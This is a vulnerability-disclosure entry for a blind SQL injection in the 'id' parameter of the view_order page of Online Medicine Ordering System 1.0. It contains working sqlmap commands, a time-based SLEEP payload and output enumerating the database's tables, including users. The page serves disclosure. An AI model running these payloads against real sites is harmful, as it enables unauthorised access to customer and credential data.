| Title | Online Medicine Ordering System v.1.0 - Blind SQL Injection |
|---|
| Description | # Exploit Title: Online Medicine Ordering System v.1.0 - Blind SQL Injection
# Exploit Author: Namit Sangidwar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15359/online-medicine-ordering-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15359/online-medicine-ordering-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Parrot GNU/Linux 4.10, Apache
Description:-
An Blind SQL injection issue in Online Medicine Ordering System v.1.0 allows an attacker to get into system database and retrieve sensitive information about the website. The data consist of "Database Name", "Tables", "Username and Password", "Cart Information and etc.
Payload:
python sqlmap.py "http://localhost/omos/admin/?page=orders/view_order&id=3" -p id --dbms=mysql --dbs --threads=10
Steps:
1) Login into admin account
2) Go to "http://localhost/omos/admin/?page=orders/view_order&id=3" and here we try sqlmap
3) As we can see our below payload we got some information regarding this
Payload: python sqlmap.py "http://localhost/omos/admin/?page=orders/view_order&id=3" -p id --dbms=mysql -D omos_db --tables --threads=10
Output:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=orders/view_order&id=3' AND (SELECT 5001 FROM (SELECT(SLEEP(5)))Upcs) AND 'eSsX'='eSsX
---
[00:36:31] [INFO] testing MySQL
[00:36:31] [INFO] confirming MySQL
[00:36:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.46, PHP 7.3.27
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[00:36:31] [INFO] fetching tables for database: 'omos_db'
[00:36:31] [INFO] fetching number of tables for database 'omos_db'
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N]
[00:36:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[00:36:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
1
[00:36:52] [INFO] adjusting time delay to 1 second due to good response times
0
[00:36:52] [INFO] retrieved: cart_list
[00:37:31] [INFO] retrieved: category_list
[00:38:21] [INFO] retrieved: customer_list
[00:39:14] [INFO] retrieved: order_items
[00:40:08] [INFO] retrieved: order_list
[00:40:31] [INFO] retrieved: product_list
[00:41:26] [INFO] retrieved: stock_list
[00:42:11] [INFO] retrieved: stock_out
[00:42:33] [INFO] retrieved: system_info
[00:43:15] [INFO] retrieved: users
Database: omos_db
[10 tables]
+---------------+
| cart_list |
| category_list |
| customer_list |
| order_items |
| order_list |
| product_list |
| stock_list |
| stock_out |
| system_info |
| users |
+---------------+
4) As jt shows out all the tables regarding the database. |
|---|
| User | Namit13 (UID 34433) |
|---|
| Submission | 10/25/2022 21:15 (3 years ago) |
|---|
| Moderation | 10/27/2022 09:48 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 212346 [SourceCodester Online Medicine Ordering System 1.0 view_order ID sql injection] |
|---|
| Points | 17 |
|---|